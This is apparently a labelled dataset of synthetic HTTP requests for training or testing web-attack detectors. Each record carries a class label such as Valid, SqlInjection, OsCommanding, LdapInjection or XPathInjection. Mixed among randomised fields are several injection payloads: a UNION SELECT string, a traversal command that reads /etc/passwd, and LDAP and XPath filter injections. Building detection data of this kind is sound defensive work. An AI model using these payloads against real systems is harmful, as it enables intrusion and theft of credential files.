GET /kJII/lcAPovj8jWo3Ft/cCO9fCMo/Ucl_LGSepme/Tlrtnsspourlnsm8ia/rb6H3DMtP/d2ynaEOWiAZdT.bin?mer20i=tiaenscnccfblatore&rooRj4qebhnd=isea21liTesSs&UWrxgGU=4206679907&afPdb1voe=%2Bme1G%3CnRo&p5qD7I7nXu=104165&rR1eTaced6hHe=eth&osfh60eyts=iret3d&AQUGrmM=03336198&Olhg=605756&Met5e3iee5Ota=8&tqghdqnrh=ttoi&gnabteAg=HEtkgas HTTP/1.1
Host: 39.60.177.154:5278
Connection: keep-alive
Accept: text/*, audio/*
Accept-Charset: x-mac-roman, iso-8859-15;q=0.8, windows-1252;q=0.5, big5;q=0.6
Accept-Encoding: 
Accept-Language: m0gs-5tmlr;q=0.8, stfixN1-Lo, eiueAa-eo, blDnhL-I02hnkUe;q=0.5
Cache-Control: no-store
Client-ip: 228.137.159.244
Cookie: bxN3eEdynrA=x;dkre9eNjr4eny= 7t;irese56=4;e3=lnode
Cookie2: $Version="77"
Date: Mon, 19 Jun 06 13:02:22 GMT
ETag: W/"QtorIqS0wyWWWY-_2"
Expect: 100-continue
From: rhj7it@hRooetd.be
If-Modified-Since: Sun, 25 Dec 05 05:17:52 UTC
If-Unmodified-Since: Thu, 15 Jul 04 19:46:23 CET
If-Match: "Jr-pSaJmuNew4s4PZC10"
If-None-Match: "bMXFBwprv6IcSgbmsjqL"
If-Range: Fri, 16 Jan 09 10:25:44 UTC
Max-Forwards: 62
MIME-Version: 9.0
Pragma: ce4Dztze='twdom'
Proxy-Authorization: Digest username="tmff8btS"
Authorization: NTLM OGV5c2FYdGp3Z2lkaHJZaWF0aWdhVG9haHJ1b2l1cnJrTkM=
Range: 31-37154,2-
Referer: http://www.e0aphr.gov/qpeAt/tTsas/ieknaaer/a9nrae9/7a1i.dll
TE: gzip,deflate,trailers
Trailer: Connection
User-Agent: mosrCeeoi4a1leWwqbuC
UA-CPU: StrongARM
UA-Disp: 719,2731,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 326x7197
Via: 4.6 2.88.241.20
Transfer-Encoding: vtih
Upgrade: nwe3t/7.8, m7d8/4.9, uea7/6.3, raeyjr/3.1
Warning: 816 www.aegrtfH.jpg "tmrtheosaoahwt" 
X-Forwarded-For: 34.156.94.22
X-Serial-Number: 101021310
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26446
Start - Id: 41237
class: SqlInjection
GET /iu@FC3_x_L@AytJv/htaccesSIB7ZP/alieqg/B.nMa/C0OirXF1/b7pN3HOS2bd/08likeTvKpaccept/yeRxZHNRF_t7XE1Z4p/tbFm8T/oldlhUB.PE78i/a03tjeds0.htm?4inputzo7xB=3149563851&ofhzbiuredH=aall&ulaSaeeewret=%29rh1e+++ladhrrmh%26%7E&er9ot=tUdLLy.s%40f&c7ictns2itAmcRR=e3nsle%3Bdperl%27bexece&2aQyhN@=15661&aitatb8=np%5Ca%28sdns HTTP/1.1
Host: www.uhuwpa0o.gov:80
Connection: 2oen
Accept: text/*;q=0.8, application/rtf;q=0.7
Accept-Charset: windows-1257;q=0.9, macintosh;q=0.2, x-mac-greek;q=0.7
Accept-Language: relt-aibhH04, X01e-egry;q=0.5
Cache-Control: no-cache
Client-ip: 137.5.183.29
Cookie2: $Version="0"
Date: Wed, 13 Oct 04 21:41:48 CET
If-Range: Sun, 04 Mar 07 04:31:28 UTC
Referer: /mxcsxriq/tba0Ojeu/fimezxa.aspx
User-Agent: Tst'    UNION   ALL  SELECT  ft     FROM nwtbtRsucs  WHERE     ''    =   '
UA-OS: Linux
Via: Cntl/0.2 www.atcdaffb.jpeg

null

End - Id: 41237
Start - Id: 17397
class: Valid
GET /lsndwplamot7ls/eYFnvos0aQlkIy.htm?hdseiycdr=nnut HTTP/1.1
Host: www.9rssti.com:80
Connection: close
Accept: video/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: v-8g1deenY, r-RaKw;q=0.5, pnzjr-bye;q=0.0, aker-n
Cache-Control: no-transform
Client-ip: 101.106.159.200
Cookie: cnrnEofenwsrr=mhd:;lu=17;inmd0e=tesock_stream;fnicyvioeRjef=rSEbuJZ;sHeegdpoRI6o4=ltelnet$ 0dtro<e@iio
Cookie2: $Version="155"
Date: Tue, 10 Nov 09 03:02:29 CET
ETag: "D2QB6MZqXmCm-axSnt"
Expect: 100-continue
From: hErN7au@nLt0ryhez.uk
If-Modified-Since: Mon, 06 Nov 06 02:37:38 CET
If-Unmodified-Since: Sat, 15 Aug 09 02:43:35 GMT
If-Match: "rPkX.2Y9YRLNxzy9"
If-None-Match: "lJgUZ@rNFdmhCFgFI"
If-Range: Sun, 31 Jul 05 23:22:16 CET
Max-Forwards: 65
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM ZWFubGU1aGUwOXJucmFyYXNwSGNvaGEwc2JhQmlvb05wSWVycWJlQWQ=
Authorization: rhsail hmwe=2eodlnm
Range: -29
Referer: /y8tlt/jen4af.conf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 1.3; cd-im; rv:3.7.5) Gecko/23033285
UA-CPU: 68000
UA-Disp: 436,9131,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3112x2775
Via: 2.4 24.189.43.144:35474, 8.0 www.lnnoMu.htm:2
Transfer-Encoding: deflate
Upgrade: skn/5.4, 8st/5.3, tia8to/8.7, wnio/7.7, w2t79p/4.2
Warning: 500 www.ietLLq.png "WitpeagmraOeteXfnE" "Fri, 22 Feb 08 21:37:25 CET"
X-Forwarded-For: 208.220.17.9
X-Serial-Number: 534036492924791
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17397
Start - Id: 19624
class: Valid
GET /okC.wERH24atdXSYz05O/e2Cv-K@UX2.gif?hs3eg=4570960&twiifpa=wl&lmsTsr3ua15cvd=sn7winntisttunhbin&4lnv5iedeenpz=4044260&2bkEoctdio=sRZ7_&icsiy=e%3Dsie%7Ess+tL%5B3i&metseeanerngaf=083&cstCdssyonu=0348367479&dtAuthwaai8=E+l&taticeetde3xaat=nt HTTP/1.0
Host: 56.226.63.136
Connection: oowtms
Accept: application/zip;q=0.2, image/*
Accept-Charset: windows-1255;q=0.5, iso-8859-5;q=0.8, windows-1258;q=0.6, iso-8859-4;q=0.9, iso-8859-2
Accept-Encoding: 
Accept-Language: ts-sigi0co;q=0.5, 05c3p-pahs7i6, efae-e, xTel-onmwe2
Cache-Control: max-age=8
Client-ip: 79.76.165.215
Cookie: ffeasttra=g;ui=08240;vIraBVYc7=a5FUe3CvpbjH;etn0hs=ossytyoluo8cliCod;hhrr=mo
Cookie2: $Version="01"
Date: Wed, 28 Jun 06 17:14:38 GMT
ETag: "gwWlvqw-Hsu3xuRd"
Expect: 100-continue
From: arin@CIbt.st
If-Modified-Since: Mon, 31 Jan 05 16:48:14 GMT
If-Unmodified-Since: Wed, 07 Feb 07 19:06:11 UTC
If-Match: *
If-None-Match: "ACMS7D9@VcRWa3mg"
If-Range: *
Max-Forwards: 921
MIME-Version: 9.3
Pragma: tyvr=rtehfcts
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: NTLM TnNIZ3J0ZWthb0VUMnQ0bmJzaGtubmFvTm02Tm5TZWM4bzhlRXNwY3Rkbw==
Range: 3666-92,-7
Referer: http://felpe8.be/iuantsau/Atazaw/iinUee/aranqklo.cgi
TE: trailers,chunked
Trailer: Connection
User-Agent: ocaj1sseoTs6i
UA-CPU: StrongARM
UA-Disp: 1867,055,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2031x847
Via: 0.9 www.nkrttDsz.js:8
Transfer-Encoding: hesfS; EdvntisN=luhnat
Upgrade: emf/6.5
Warning: 653 122.96.172.210:981 "ulzwtrnh" "Fri, 28 Dec 07 03:17:39 UTC"
X-Forwarded-For: 165.100.124.216
X-Serial-Number: 84453733272881684848
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19624
Start - Id: 15997
class: Valid
GET /mb.E6sMIVD2sa/o-lDFkcRhldN.rq0fmyT.jsp?oqwt0nae8huhn=fVcQd&ngaeeichwnn=mTiidro&admM6aRUd=762668&sasnvWltdh=%3F&wYetctB4H=288245&neHheh=lSA3m&o6pndj=EDe1nenh&olatseooioey=ytfsdchQ4LY&mw=38210&oAHrin=5594506&NEeeunjv4tH=r36no&brGnrd4clnunn=aDnd&miyNiplsaei=Nstxxezw2Lysho4vht HTTP/1.1
Host: www.bah4oimeE.org
Connection: reaaae
Accept: video/mpeg;q=0.9, audio/basic, text/plain;q=0.7
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.3, gzip;q=0.0, gzip, identity
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 29.85.80.249
Cookie: IFR4netcatOj=794;sl0=tstuifh5h6;bE5shrnT2ao=of7niass8yotyetesI
Cookie2: $Version="2"
Date: Wed, 04 Feb 09 18:49:31 CET
ETag: "foHX3bXLfs1bsOyu"
Expect: 100-continue
From: aebIo@aienFcnaoN.cz
If-Modified-Since: Wed, 12 Dec 07 02:38:31 UTC
If-Unmodified-Since: Tue, 30 Aug 05 10:12:35 CET
If-Match: *
If-None-Match: "NQq4up-uN__TvD.uJSBw"
If-Range: "khf1-EnS-X88dKAJdLYZ"
Max-Forwards: 6365
MIME-Version: 4.4
Pragma: ts=olrer
Proxy-Authorization: Basic ZHVlbDo2dGUzMQ==
Authorization: Digest nc=38fFd802
Range: 4-136390,-06191
Referer: http://www.iiAeoFhi.st/hapq/Oj5ahd.cfm
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/1.8 (compatible; MSIE 6.6; WinNT; rdubr; mhelhtvezn)
UA-CPU: PowerPC
UA-Disp: 9829,461,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 273x3585
Via: 5.4 www.izo5h.html
Transfer-Encoding: compress
Upgrade: aieRqe/7.7, c9oee/9.2, Halyoi/5.2, nsb/5.8
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 131.126.252.251
X-Serial-Number: 606819653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15997
Start - Id: 43070
class: OsCommanding
PUT /eewrfotTorg.cgi? HTTP/1.1
Content-Length: 204
Content-Language: aAlef,u922,hda
Content-Encoding: identity
Content-Location: /erlfBnni/iOuel/i2yn/raiing.mp3
Content-MD5: bWxlcnQ3Z2xhaGVvY29oRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 06 Oct 08 21:59:43 GMT
Last-Modified: Sun, 22 Jul 07 02:42:10 GMT
Host: 210.233.42.216:9
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: r9-eacgpc6c;q=0.5
Cache-Control: Etote3c=asi
Client-ip: 159.80.6.131
Cookie: ueatc=pxaa;34RXdBT7r=1kiBv;tse=7377;mq6lOsat6ta=hcR9pplagk;en212bboevtdtdI=hio
Cookie2: $Version="611"
Date: Fri, 20 Jun 08 10:19:20 CET
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: dshn
From: sTleEdu@dtAttFd.de
If-Modified-Since: Sun, 02 May 10 23:25:55 GMT
If-Unmodified-Since: Mon, 27 Nov 06 22:11:43 UTC
If-Match: "yELw96P@2kUYhHnCzF"
If-None-Match: "dsj7aAzseQ1@tddd"
If-Range: "nFYupowMN3Zw0Xnal"
Max-Forwards: 984
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: Digest realm
Range: 53-,7351-3480
Referer: /k0r7/3eiia/R4dtttED/r4oltm.tiff
TE: gzip;q=0.0,deflate,trailers
Trailer: Accept
User-Agent: enci/1.7
UA-CPU: StrongARM
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/1.4 www.edishi.css, FTP/0.0 202.214.241.95, 5.0 www.R2ccN.html
Transfer-Encoding: compress
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

asGeansstehee=23&cY=24&h00siraelyaU=/../../../../../../../bin/cat /etc/passwd     |&ondqESbdeEMmg3n=hbRzEv&07Hd66K=vlwtG&ort9wyoeeihry=7pb&ZNEO=cl ure&pecogKes=649&hx0=5837&Hr=1lcT

End - Id: 43070
Start - Id: 4755
class: Valid
POST /rokBxKbv-d/mous8e/b3t.js? HTTP/1.1
Content-Length: 322
Content-Language: ean
Content-Encoding: gzip
Content-Location: http://www.30he2tea.uk/zego/oohkEtl.rar
Content-MD5: Q3Nuc24ybnc1ZWlJbjBFQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Aug 08 02:57:35 CET
Last-Modified: Sun, 21 Dec 08 16:20:22 UTC
Host: www.osrestrch.st
Connection: njcsy
Accept: */*
Accept-Charset: euc-tw, iso-8859-1, hz-gb-2312;q=0.0
Accept-Encoding: 
Accept-Language: savLlid-aEooitix;q=0.2, ntoieRsT-pe11;q=0.1
Cache-Control: min-fresh=39921
Client-ip: 133.157.176.125
Cookie: oT=eWwwOo2ihOZu;dbptuanbsucwi=;ygobject
Cookie2: $Version="9"
Date: Tue, 07 Apr 09 05:54:56 GMT
ETag: W/"pUGGOiibHW17Ug-@yr"
Expect: 100-continue
From: vryaot@tse7mag.it
If-Modified-Since: Sun, 29 Nov 09 02:20:20 UTC
If-Unmodified-Since: Sun, 29 Apr 07 11:05:07 UTC
If-Match: *
If-None-Match: "9qtQmYp@ggM5nE-V2"
If-Range: Sat, 28 Jan 06 06:23:34 UTC
Max-Forwards: 78
MIME-Version: 3.0
Pragma: artemr='inr'
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: Digest qop=auth-int
Range: -9054
Referer: http://www.smhti4en.be/dlmpsOv/ssian/oaJsUu/ehgR/hotTae2r.jpg
TE: trailers
Trailer: If-None-Match
User-Agent: udctt5anJ (qpn1rvQr@g; iIB7bgx; e@vIvS; rkuVyLt; x_7FKy_)
UA-CPU: MIPS
UA-Disp: 717,3860,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4366x138
Via: 2.7 www.rlt9yao.shtml, 0.6 207.75.25.139
Transfer-Encoding: soue; fgy4ye=n0ONgehf
Upgrade: 2Ir/5.8, a6skoi/1.9, ros7a1/6.5, eeahh/1.8, eaetor/5.0
Warning: 345 18.66.75.142 "egj3Lsf4olmsnle" 
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 564855941
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fewSe=n&ntx0t=27&etisdgreaeea=m% &fk0byWsYy=urri-er?touh6oupdate8e-$a&eien5sdeutEod9= abi (&&neuht6eio0=1&oxnes9=47859945&KHKSnRGa=o1EL_I28&2odr=gsc/wf&rncBhp~&oaurk=04&positionMUW.SN5H=ngutsto6zneydKt&8nhtpassTbs3usr=0411&Sxo8ifhernroie6=hhevalr%ttovek\e@(es9[&enxO=tsOselectq 0o&wl=oeueaai2cnnD

End - Id: 4755
Start - Id: 11444
class: Valid
GET /oSO0EH4.png? HTTP/1.0
Host: 79.48.213.106
Connection: ttsi
Accept: image/*;q=0.0, video/mpeg;q=0.5, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 69.208.78.9
Cookie: 9NJtr=hssevulen
Cookie2: $Version="561"
Date: Wed, 04 Mar 09 12:04:38 CET
ETag: W/"R51MOFyEAdg@_kqyEB"
Expect: totohex=namfajg
From: ezBfko@fesnitr.uk
If-Modified-Since: Tue, 01 Feb 05 15:10:58 UTC
If-Unmodified-Since: Thu, 19 Aug 04 03:15:00 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: peof uVul=hYao9H
Authorization: Basic ZWFleTo2cGZpZQ==
Range: 17-873364,-1915
Referer: /tRez4/hseb/neldlts.cgi
TE: gzip
Trailer: From
User-Agent: shtt/3.9.0.6.2
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 514x0544
Via: 8.4 105.216.79.41, HTTP/0.0 www.OIidena.css
Transfer-Encoding: gzip
Upgrade: elees/2.8
Warning: 370 www.egaerts.html:66201 "udt5tl" 
X-Forwarded-For: 40.167.68.225
X-Serial-Number: 0375108727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11444
Start - Id: 38310
class: LdapInjection
GET /p4lwe5delcsi9y3rg/yx1fiwwpe/go1act/nT7tu2F_l1F/ek0SxIxZE1S/ytkJNJJvDzRakjc92.jpg?pOnloe=4texecnode%27IeOupdatehvwinnt%3Ce&itrn=78%29%28%26%28objectClass%3Deef%29%28%7C%28sn%3D++++rEfn%29%28cn%3Dt++J*%29%29&hu0raoruietbo=a6huw&rnahpZcrioen2tr=w&roenresm4xsp=etnraa HTTP/1.1
Host: www.nxrji.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 2.55.18.28
Cookie: cayeeeauEh=daxs;rsnrnsa0Lhnps9=siearsboolmteFgbp;olsde9Psiel=eOTT_Y
Cookie2: $Version="14"
Date: Mon, 20 Aug 07 09:07:50 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: k3ilm
From: ctbt@euirsarao.st
If-Modified-Since: Thu, 29 Jun 06 02:16:43 CET
If-Unmodified-Since: Thu, 20 Mar 08 19:44:56 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Oct 08 16:00:50 CET
Max-Forwards: 02
MIME-Version: 3.2
Pragma: lsid='seYRq'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest nc=D8AF1d4F
Range: 529307-,-0
Referer: /Lvpti/lrt0/q7Br/imel/avtudiB.htm
TE: trailers
Trailer: Pragma
User-Agent: yhi3UbPzk http://www.pnct.biz
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: HTTP/4.5 138.49.2.137, FTP/8.3 www.gyhsieir.shtml, 1.1 239.183.221.127
Transfer-Encoding: inhmo3
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38310
Start - Id: 35557
class: XPathInjection
POST /YFaxdselectLYdelete5/v5SN.x/f@FZCtyH3CfYyj.tiff? HTTP/1.0
Content-Length: 218
Content-Language: Okn5rich,s2ee,rPrr3r
Content-Encoding: compress
Content-Location: /nkhtLsr/cBut/xpsSciki.swf
Content-MD5: aHlUNXJuZ0FzdGltcHljSA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 20:59:35 GMT
Last-Modified: Tue, 22 Apr 08 04:17:08 UTC
Host: 168.214.199.188
Connection: close
Accept: image/*;q=0.0, audio/x-wav
Accept-Charset: x-mac-roman;q=0.0, gb2312, iso-8859-8, x-mac-ce
Accept-Encoding: 
Accept-Language: safas5-jld;q=0.8, eefu-e;q=0.5, Nel-i2jH4u, ega-n
Cache-Control: no-cache
Client-ip: 254.29.59.241
Cookie: NRf2exec9=64243;roenFtjogaaieR=9nsoesa5nayme5lo;sa9otdec=ltndekf3hpasswdvar10drehomed
Cookie2: $Version="8"
Date: Sun, 23 Jul 06 11:36:16 GMT
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: 8ty7e@ti3yral5l.de
If-Modified-Since: Tue, 27 Oct 09 13:05:43 UTC
If-Unmodified-Since: Fri, 02 Dec 05 23:20:52 UTC
If-Match: *
If-None-Match: *
If-Range: "uf7azlJ_kVfg3dgG87"
Max-Forwards: 67
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: NTLM U3ZOYUNzdG5lZnE4d2V5cGZxTmNzbnByYWxlVzZvTWFyNHRvdGhzcw==
Range: 1158-964,-612192
Referer: http://www.eyos.org/tuetg/eldbtfo.jpeg
TE: deflate;q=0.5,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.7 (Windows; U; Win 9x 9.2; HN-r4; rv:5.5.5) Gecko/92746275
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 174x8533
Via: 9.4 1.19.245.236
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 491 www.obverec.js "eapntohnl" "Thu, 19 May 05 14:19:45 GMT"
X-Forwarded-For: 110.77.12.7
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

osolnahwCynt=867&iacgoOnrweg5e=ir&ca=1858141605&erWtda=ngkpsXYr&c1xisto=tipb&connecteLF6Uenph-e=whOMp6SPJ&fKx7@kbR-yS6=ricaeoVs'  or     6     <    count(path/child::*)    or  'p75otrhe'    =    '

End - Id: 35557
Start - Id: 6758
class: Valid
POST /w.IformJoptUX/lREBWW1tr/fr8nfi01qErLue/psnsrokr4tReT/Hogsn/rfnhpsLen/Coyu9rrotg2/agdem6a5epdsldlireet/Zqlv2oNpkF@Yform/R-lTX.asp? HTTP/1.1
Content-Length: 185
Content-Language: 9je
Content-Encoding: identity
Content-Location: /hfel/sislan.php
Content-MD5: RXNSb2d5bjd5ZThhZmFucg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Nov 08 24:34:13 UTC
Last-Modified: Sun, 22 Aug 04 20:28:16 GMT
Host: 41.131.234.163
Connection: close
Accept: */*;q=0.8
Accept-Charset: utf-7, windows-1253;q=0.0, iso-2022-kr;q=0.7, windows-874;q=0.6, windows-1252;q=0.0
Accept-Encoding: deflate, identity
Accept-Language: iejard5t-slai2bN1;q=0.7, ehutd-egm7favi;q=0.6, aPei-mttht6, mi3imua-Lea7yc2
Cache-Control: max-stale=30668
Client-ip: 197.112.140.244
Cookie: Eeeioiwk1=436391;neRusDbSqplcamM=64451015;LD-Xefmecechowindow.open=7tnpmqptewno7liNR;hlcoctcetspir=Oa;sm=Booerq
Cookie2: $Version="656"
Date: Tue, 17 Jul 07 24:20:43 CET
ETag: W/"2vRd5oACFtVI9Ay_"
Expect: 100-continue
From: i6Nyv@5oumwccEOt.be
If-Modified-Since: Fri, 22 Jan 10 05:26:37 CET
If-Unmodified-Since: Sun, 08 Mar 09 18:52:11 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 14 Dec 07 06:46:44 GMT
Max-Forwards: 95
MIME-Version: 8.5
Pragma: nentet='eonltr9'
Proxy-Authorization: Basic cnRyaDpudG5yZHdv
Authorization: NTLM cW5laGloRUllb2lka2hhdUVlaGJydTVneEZhZnJpaGF2aHRvZHNzaWdqem5zYXQ=
Range: 6-,0896-57
Referer: http://www.nisty.be/la6n/u0jtt/etereuy/rm1diA.mpg
TE: trailers,chunked
Trailer: Expect
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 7.2; 2r-sI; rv:3.3.4) Gecko/02381486
UA-CPU: StrongARM
UA-Disp: 342,103,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3268x616
Via: 5.9 29.72.3.218, Tinnd/2.3 www.ieuu.js, 3.7 www.euneawig.shtml
Transfer-Encoding: deflate
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 686 27.211.29.45 "sijrpot" "Sat, 10 Jun 06 10:21:01 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 5587841310492306
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

te=uTOnpHN&oaqeyyneiw=gbporel&a19tsamonc=58&getcn6ntgiNoa8=ee=2/t dq7r:&b1nvgdei5ewy=vAYMGYp&ih=urphp&vd9dk28rim=cy-@RbQwj&vteesobim1as=tr2wXX69sI&znj=92&vformXLtHbpJmail=)ned

End - Id: 6758
Start - Id: 24665
class: Valid
GET /upNemVFIQzUI.sh? HTTP/1.1
Host: 58.94.119.155
Connection: keep-alive
Accept: video/*;q=0.1, video/mpeg
Accept-Charset: windows-1250;q=0.4, iso-8859-4;q=0.0, iso-8859-5;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=668
Client-ip: 148.233.252.203
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="662"
Date: Fri, 06 Apr 07 07:51:20 CET
ETag: "E23@zmqtynS5u3jM_G-W"
Expect: 100-continue
From: dtiJev@chlmiutOj.fr
If-Modified-Since: Thu, 01 Jan 09 08:17:21 CET
If-Unmodified-Since: Fri, 27 Apr 07 01:24:16 CET
If-Match: "DB31G9_ntMw_HOjBBHqR"
If-None-Match: *
If-Range: Sun, 25 Jan 04 02:56:37 CET
Max-Forwards: 0
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: ey32r aystd9=ymtsuleh
Authorization: d16s iQoosen=tAnt
Range: 7216-
Referer: /Alr9fW.msf
TE: gzip;q=0.7,trailers,trailers
Trailer: Expect
User-Agent: iX9xUO http://www.1ijrPneU.gov
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 089x5784
Via: 4.2 10.228.196.170, 9.1 31.76.94.215, FTP/2.9 253.166.232.3
Transfer-Encoding: compress
Upgrade: 5nc/3.4, vr6e/9.2, opl/0.0, drdnea/1.4, oieily/2.2
Warning: 680 www.slre.css:8068 "tgceuha" 
X-Forwarded-For: 186.140.0.183
X-Serial-Number: 791354389748242566
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24665
Start - Id: 20384
class: Valid
GET /6SILzgroup bycbbMu/a0B-eVY0M/Yg3onn2oeenns9h7g/qZKLQq/eO/stce3huEyx/fVpSQADXO28yk/deeei49ehnr08/Mb01/4rionhresOnUhs7/pXlH@7k/8Kzyf1iXHX.mspx?a.5j=21337&5ihcoT=smto&gibieie=ubo&hbe8thm6irrf=positionjy+pifnzm-uh8iij%7Ete&5eIhtooomens=sfe58fhats8rlRl&Huatirnpx=iuidtaee&scodwdtshlh8=uttlrgurslscriptr&mbdnlnzmzsaIfe=+E%3E9ojmochat HTTP/1.1
Host: www.sFaprw.biz
Connection: nmaett
Accept: text/html, text/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip
Accept-Language: nppEoho-hgbr;q=0.5
Cache-Control: only-if-cached
Client-ip: 154.205.171.226
Cookie: riojDctia95u=52996767;oede=2;Zeed2tmu=86;oreitiavicE7aw=apositionsgteed
Cookie2: $Version="6"
Date: Mon, 25 Dec 06 16:47:17 CET
ETag: W/"FkFBBTp5N8Mwz4jd"
Expect: iehs
From: ueaw@nsel.fr
If-Modified-Since: Fri, 08 Aug 08 09:49:00 CET
If-Unmodified-Since: Sun, 02 Jul 06 09:36:41 GMT
If-Match: "dGz04exn86tuTpdSCmV"
If-None-Match: "DlUI78naVATpu3@"
If-Range: Mon, 22 Oct 07 01:24:09 CET
Max-Forwards: 9678
MIME-Version: 5.8
Pragma: b='enepwn'
Proxy-Authorization: NTLM Y3hkaG1lRXNpYnllbnQ1anRubEc2b29hdGxwbGhpYWVudGU3blQxdGVlc3RhdHI=
Authorization: Digest uri=http://www.AnsNsaqu.org/otaH2drf.js
Range: -9710,4363-45984
Referer: http://www.umnai.be/6el78/ogosrhe/p8GlreR/or83ap.wmn
TE: gzip,trailers,gzip;q=0.1
Trailer: Authorization
User-Agent: ledaooad3ytiluo
UA-CPU: Sparc
UA-Disp: 8020,2426,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 225x040
Via: 2.3 109.15.4.30, 4.3 89.167.194.183
Transfer-Encoding: compress
Upgrade: wbsoPk/6.5, ona/5.9, rnyanm/2.0, ej1ben/3.4
Warning: 519 www.toonc.htm "orEiieino7cus" 
X-Forwarded-For: 126.30.228.195
X-Serial-Number: 11331311370992169456
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20384
Start - Id: 49550
class: XPathInjection
